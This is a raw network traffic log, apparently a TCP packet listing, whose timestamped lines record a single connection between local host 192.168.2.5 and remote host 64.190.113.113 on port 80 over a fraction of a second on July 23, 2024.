                                              Jul 23, 2024 06:16:17.480562925 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.480595112 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.480607986 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.480643988 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.481134892 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.481167078 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.481198072 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.481230021 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.481254101 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.481261015 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.481290102 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.481292963 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.481324911 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.481357098 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.481372118 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.481388092 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.481405020 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.482121944 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482155085 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482186079 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482213020 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.482218981 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482248068 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.482251883 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482284069 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482296944 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.482316017 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482363939 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482409954 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.482949018 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482980967 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.482996941 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.483011961 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483043909 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483076096 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483089924 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.483108044 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483123064 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.483139992 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483170986 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483201981 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483222008 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.483257055 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.483860016 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483892918 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483923912 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483948946 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.483956099 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.483987093 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484009981 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.484019041 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484050035 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484066010 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.484081984 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484112978 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484160900 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.484704971 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484738111 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484761000 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.484769106 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484802008 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484832048 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484849930 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.484864950 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484883070 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.484898090 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484930992 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.484982967 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.560844898 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.560897112 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.560934067 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561005116 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.561158895 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561191082 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561213017 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.561223984 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561255932 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561301947 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.561582088 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561614990 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561630011 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.561840057 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561872005 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561903954 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561918020 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.561937094 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.561956882 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.561968088 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562000036 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562031984 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562045097 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.562078953 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.562655926 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562689066 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562720060 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562752962 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562779903 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.562783957 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562813997 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.562815905 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562848091 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562879086 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.562894106 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.562927961 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.563693047 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563724995 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563755035 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563781023 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.563786030 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563817978 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563843012 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.563848972 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563879967 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563890934 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.563911915 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563944101 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563975096 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.563987017 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.564006090 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.564019918 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.564785957 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.564819098 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.564848900 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.564874887 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.564882040 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.564910889 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.564913988 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.564946890 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.564977884 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565009117 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565016985 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.565041065 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565057039 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.565092087 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.565588951 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565640926 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565687895 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565720081 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565751076 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565774918 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.565783024 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565814018 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565833092 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.565845966 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565877914 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.565926075 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.566581011 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.566612959 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.566632032 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.566647053 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.566679001 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.566709995 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.566725969 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.566741943 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.566761971 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.566773891 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.566804886 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.566836119 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.566859007 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.566899061 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.567543983 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.567574978 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.567610025 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.567641020 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.567646027 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.567678928 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.567688942 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.567709923 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.567742109 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.567773104 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.567792892 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.567804098 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.567827940 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.568546057 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.568578005 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.568593025 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.568610907 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.568645000 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.568675995 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.568690062 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.568708897 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.568727016 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.568739891 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.568772078 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.568824053 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.569334030 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569366932 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569382906 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.569396973 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569428921 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569459915 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569474936 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.569492102 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569509983 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.569523096 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569555044 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569586039 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569607019 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.569617033 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569643021 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.569649935 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569684982 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.569698095 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.570318937 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570350885 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570383072 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570396900 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.570414066 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570442915 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.570446014 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570477009 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570492983 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.570508957 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570539951 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570570946 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570583105 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.570602894 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.570617914 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.570633888 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.571650982 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.605155945 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.605362892 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.605396032 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.605446100 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.605447054 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.605478048 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.605493069 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.605509996 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.605542898 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.605556011 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.651114941 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.651202917 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.651760101 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.651791096 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.651840925 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.651846886 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.651871920 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.651904106 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.651916027 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.651936054 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.651968002 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.651979923 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.651999950 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652033091 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652044058 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.652192116 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652224064 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652256966 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652364969 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.652611017 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652643919 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652674913 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652705908 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.652707100 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652738094 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652751923 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.652772903 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.652825117 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.653052092 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653083086 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653115034 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653126955 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.653146982 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653178930 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653191090 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.653449059 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653480053 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653496027 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.653512001 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653542042 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653568029 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.653573990 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653606892 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653623104 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.653640032 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653671026 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653683901 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.653702974 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653734922 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.653745890 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.654371023 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654402971 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654423952 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.654434919 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654465914 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654484034 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.654498100 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654530048 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654541969 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.654561043 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654592991 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654603958 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.654624939 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654658079 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.654668093 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.655339003 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655370951 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655390978 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.655402899 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655436993 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655451059 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.655479908 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655512094 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655524015 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.655544996 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655575991 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655586004 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.655608892 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655642033 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655653954 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.655673981 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.655719042 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.656316996 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656351089 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656382084 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656399965 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.656414032 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656445980 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656466007 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.656478882 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656542063 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.656543970 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656577110 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656609058 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656622887 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.656641960 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.656691074 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.657288074 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657320023 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657351971 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657363892 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.657382965 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657414913 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657426119 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.657445908 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657476902 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657490015 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.657509089 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657540083 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657552004 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.657571077 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.657613993 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.658269882 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658302069 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658334017 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658344984 CEST4972780192.168.2.564.190.113.113
                                              Jul 23, 2024 06:16:17.658365011 CEST804972764.190.113.113192.168.2.5
                                              Jul 23, 2024 06:16:17.658396959 CEST804972764.190.113.113192.168.2.5
